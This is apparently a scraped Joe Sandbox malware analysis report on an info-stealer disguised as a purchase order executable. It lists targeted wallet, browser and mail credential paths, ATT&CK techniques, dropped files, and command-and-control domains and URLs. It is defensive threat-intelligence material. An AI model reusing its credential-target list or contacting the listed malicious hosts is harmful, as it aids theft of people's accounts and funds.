                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7239043699.00000000017CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jC:\Users\user\AppData\Roaming\Jaxx\Local Storage\\*
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7239043699.00000000017CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jC:\Users\user\AppData\Roaming\Jaxx\Local Storage\\*
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO No. 3200005919.exe PID: 5920, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    11
                    Masquerading
                    2
                    OS Credential Dumping
                    121
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection
                    11
                    Virtualization/Sandbox Evasion
                    2
                    Credentials in Registry
                    11
                    Virtualization/Sandbox Evasion
                    Remote Desktop Protocol1
                    Archive Collected Data
                    Exfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    1
                    Credentials In Files
                    1
                    Process Discovery
                    SMB/Windows Admin Shares4
                    Data from Local System
                    Automated Exfiltration3
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Process Injection
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object Model1
                    Clipboard Data
                    Scheduled Transfer13
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information
                    LSA Secrets26
                    System Information Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Timestomp
                    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    File Deletion
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755357 Sample: PO No. 3200005919.exe Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 38 dbxo2.shop 2->38 40 montevivo.es 2->40 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 4 other signatures 2->52 9 PO No. 3200005919.exe 2 42 2->9         started        signatures3 process4 file5 24 C:\Users\user\Overfurnished\...\qipcap.dll, PE32 9->24 dropped 26 C:\Users\user\Overfurnished\...\WMIMethod.dll, PE32+ 9->26 dropped 28 C:\Users\user\AppData\Local\...\System.dll, PE32 9->28 dropped 54 Tries to detect Any.run 9->54 13 PO No. 3200005919.exe 63 9->13         started        signatures6 process7 dnsIp8 42 dbxo2.shop 104.21.2.6, 49830, 49832, 80 CLOUDFLARENETUS United States 13->42 44 montevivo.es 86.109.170.4, 49829, 80 ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ES Spain 13->44 30 C:\Users\user\AppData\...\vcruntime140.dll, PE32 13->30 dropped 32 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 13->32 dropped 34 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 13->34 dropped 36 45 other files (none is malicious) 13->36 dropped 56 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->56 58 Tries to steal Instant Messenger accounts or passwords 13->58 60 Tries to steal Mail credentials (via file / registry access) 13->60 62 6 other signatures 13->62 18 cmd.exe 1 13->18         started        file9 signatures10 process11 process12 20 conhost.exe 18->20         started        22 timeout.exe 1 18->22         started       

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PO No. 3200005919.exe62%ReversingLabsWin32.Trojan.Leonem
                    PO No. 3200005919.exe47%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\mozglue.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\nss3.dll4%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\ucrtbase.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll0%ReversingLabs
                    C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dll0%ReversingLabs
                    C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dll0%ReversingLabs
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    montevivo.es0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://mozilla.org00%Avira URL Cloudsafe
                    http://montevivo.es/lPkFJXszrxOMoP0.hhp0%Avira URL Cloudsafe
                    http://dbxo2.shop/dbx2/index.php0%Avira URL Cloudsafe
                    http://ocsp.thawte.com00%Avira URL Cloudsafe
                    http://dbxo2.shop/dbx2/index.php?0%Avira URL Cloudsafe
                    http://www.mozilla.com00%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    montevivo.es
                    86.109.170.4
                    truefalseunknown
                    dbxo2.shop
                    104.21.2.6
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://montevivo.es/lPkFJXszrxOMoP0.hhpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://dbxo2.shop/dbx2/index.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.mozilla.com/en-US/blocklist/mozglue.dll.5.drfalse
                        high
                        http://nsis.sf.net/NSIS_ErrorErrorPO No. 3200005919.exefalse
                          high
                          http://crl.thawte.com/ThawteTimestampingCA.crl0PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            http://dbxo2.shop/dbx2/index.php?PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://mozilla.org0PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.thawte.com0PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.mozilla.com0PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            86.109.170.4
                            montevivo.esSpain
                            196713ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ESfalse
                            104.21.2.6
                            dbxo2.shopUnited States
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:755357
                            Start date and time:2022-11-28 16:34:15 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 33s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:PO No. 3200005919.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.phis.troj.spyw.evad.winEXE@8/56@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 8.9% (good quality ratio 8.6%)
                            • Quality average: 88.1%
                            • Quality standard deviation: 22.6%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 67
                            • Number of non-executed functions: 77
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 40.126.31.73, 20.190.159.2, 20.190.159.71, 20.190.159.75, 40.126.31.71, 20.190.159.0, 20.190.159.68, 20.190.159.4
                            • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            No simulations
                            No context
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            CLOUDFLARENETUShttps://whores-near-you.com/n185Get hashmaliciousBrowse
                            • 188.114.97.3
                            500 126.htmlGet hashmaliciousBrowse
                            • 104.18.11.207
                            Paid_invoice.htmlGet hashmaliciousBrowse
                            • 104.18.11.207
                            https://storageapi.fleek.co/230cd701-cb1b-49c1-907c-9b7012f1b99b-bucket/qen.html#Get hashmaliciousBrowse
                            • 104.17.25.14
                            https://www.degussa-bank.de/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.sba.gov///www.iedcolombiaaprende.edu.co/doc/Get hashmaliciousBrowse
                            • 104.18.11.207
                            https://mailsrver.contributes.rest/databases.html?home=mafisher@archphila.orgGet hashmaliciousBrowse
                            • 104.21.20.237
                            VM28903287.htmlGet hashmaliciousBrowse
                            • 104.17.25.14
                            file.exeGet hashmaliciousBrowse
                            • 104.21.71.105
                            http://tinyurl.com/35z2tkh4Get hashmaliciousBrowse
                            • 172.67.1.225
                            RFQ 8525-22.exeGet hashmaliciousBrowse
                            • 172.67.214.243
                            E-Fax_Attached_for_savethechildren.org_-_Nov_24_2022-1.emlGet hashmaliciousBrowse
                            • 172.64.132.15
                            Encomenda(P.O52403495-2022)INAUTOM.exeGet hashmaliciousBrowse
                            • 188.114.96.3
                            Swift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                            • 172.67.203.65
                            Orden de compra #PO06709.vbsGet hashmaliciousBrowse
                            • 172.67.184.213
                            https://zpr.io/3C7L92FR2mktGet hashmaliciousBrowse
                            • 104.22.24.131
                            https://m52qkvexb4orfft3rdgn4jilepn4c7o4frvfguoxoinzpcnom-ipfs-w3s-link.translate.goog/?_x_tr_hp=bafybeicle&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#claus.sauter@verbio.deGet hashmaliciousBrowse
                            • 104.18.23.52
                            file.exeGet hashmaliciousBrowse
                            • 188.114.96.3
                            Facture.htmlGet hashmaliciousBrowse
                            • 104.26.7.107
                            file.exeGet hashmaliciousBrowse
                            • 172.67.161.69
                            045624132441524.exeGet hashmaliciousBrowse
                            • 23.227.38.74
                            ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ESjustificante de transferencia.vbsGet hashmaliciousBrowse
                            • 86.109.178.184
                            justificante de transferencia.vbsGet hashmaliciousBrowse
                            • 86.109.178.184
                            mPiGBvuVOZGet hashmaliciousBrowse
                            • 86.109.161.101
                            by0RJi2Iv5Get hashmaliciousBrowse
                            • 86.109.161.105
                            home.x86Get hashmaliciousBrowse
                            • 86.109.161.102
                            TRxXcJhSPCGet hashmaliciousBrowse
                            • 86.109.161.106
                            Payment Report - 2022-06-13_1548 Mwenergy.zipGet hashmaliciousBrowse
                            • 86.109.166.218
                            ACH Payment Advice.xlsGet hashmaliciousBrowse
                            • 86.109.166.218
                            GND-010622 RMXI-130622.xlsGet hashmaliciousBrowse
                            • 86.109.166.218
                            75_06132022.xlsGet hashmaliciousBrowse
                            • 86.109.166.218
                            form 06.13.2022 Marylanning.xlsGet hashmaliciousBrowse
                            • 86.109.166.218
                            Rechnungs-Details.xlsGet hashmaliciousBrowse
                            • 86.109.166.218
                            NAP038527191TW.zipGet hashmaliciousBrowse
                            • 86.109.166.218
                            form 06.13.2022 Marylanning.xlsGet hashmaliciousBrowse
                            • 86.109.166.218
                            MEgW3GiWtxGet hashmaliciousBrowse
                            • 86.109.161.106
                            mips-20220403-1044Get hashmaliciousBrowse
                            • 86.109.161.104
                            copy payment.xlsGet hashmaliciousBrowse
                            • 86.109.178.186
                            ARCHIVO-709459.xlsGet hashmaliciousBrowse
                            • 86.109.178.186
                            ARCHIVO-709459.xlsGet hashmaliciousBrowse
                            • 86.109.178.186
                            Form 03.29.2022, USA.xlsGet hashmaliciousBrowse
                            • 86.109.178.186
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dllSwift Mesaj#U0131#09971.exeGet hashmaliciousBrowse
                              E-DEKONT.exeGet hashmaliciousBrowse
                                VAN66789.exeGet hashmaliciousBrowse
                                  e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exeGet hashmaliciousBrowse
                                    MhQTqiCvm1.exeGet hashmaliciousBrowse
                                      PROFORMA-418340-2022.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exeGet hashmaliciousBrowse
                                          SecuriteInfo.com.Win32.BotX-gen.30874.3243.exeGet hashmaliciousBrowse
                                            Fedex No71502.exeGet hashmaliciousBrowse
